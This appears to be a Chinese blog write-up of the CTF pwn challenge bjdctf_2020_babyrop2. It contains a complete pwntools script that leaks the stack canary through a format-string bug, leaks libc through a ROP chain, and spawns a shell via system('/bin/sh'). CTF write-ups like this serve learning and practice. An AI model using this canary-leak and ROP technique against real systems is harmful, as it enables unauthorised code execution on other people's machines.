• bjdctf_2020_babyrop2


    程序存在两个漏洞,gift存在格式化字符串漏洞,vuln存在栈溢出漏洞

     这题和攻防世界的Mary_Morton类似,用格式化字符串漏洞泄露canary,然后就是常规的栈溢出来getshell,需要注意的是在gift里面只能输入6个字符

     脚本如下

    # -*- coding: utf-8 -*-
    from pwn import *
    from LibcSearcher import *
    context.log_level='debug'
    
    r=remote('node3.buuoj.cn',27345)
    #r=process('./bjdctf_2020_babyrop2')
    elf=ELF('./bjdctf_2020_babyrop2')
    pop_rdi=0x0000000000400993
    puts_got=elf.got['puts']
    puts_plt=elf.plt['puts']
    vuln_addr=elf.symbols['vuln']
    
    #泄露canary
    r.recvuntil("I'll give u some gift to help u!")
    r.sendline('%7$p')
    r.recvuntil('0x')
    canary=int(r.recv(16),16)
    print('[+]canary: ',hex(canary))
    
    payload='a'*(0x20-0x8)+p64(canary)+'b'*0x8
    payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
    r.recvuntil('Pull up your sword and tell me u story!')
    r.sendline(payload)
    r.recv()
    
    puts_addr=u64(r.recv(6).ljust(8,'x00'))
    libc=LibcSearcher('puts',puts_addr)
    libc_base=puts_addr-libc.dump('puts')
    system_addr=libc_base+libc.dump('system')
    bin_addr=libc_base+libc.dump('str_bin_sh')
    
    r.recvuntil('Pull up your sword and tell me u story!')
    payload='a'*(0x20-0x8)+p64(canary)+'b'*0x8
    payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr)
    r.sendline(payload)
    
    r.interactive()
  • 相关阅读:
    Kafka的Controller
    kafka 为什么能那么快?高效读写数据,原来是这样做到的
    kafka的消费
    kafka的数据同步原理ISR、ACK、LEO、HW
    kafka 工作流程及文件存储机制
    kafka的简单架构
    Sangfor AC在线用户显示大量公网IP
    H3C抓包命令
    Android- 音量控制
    call指令的地址是怎么计算出来的。
  • 原文地址:https://www.cnblogs.com/gaonuoqi/p/12397427.html
Copyright © 2020-2023  润新知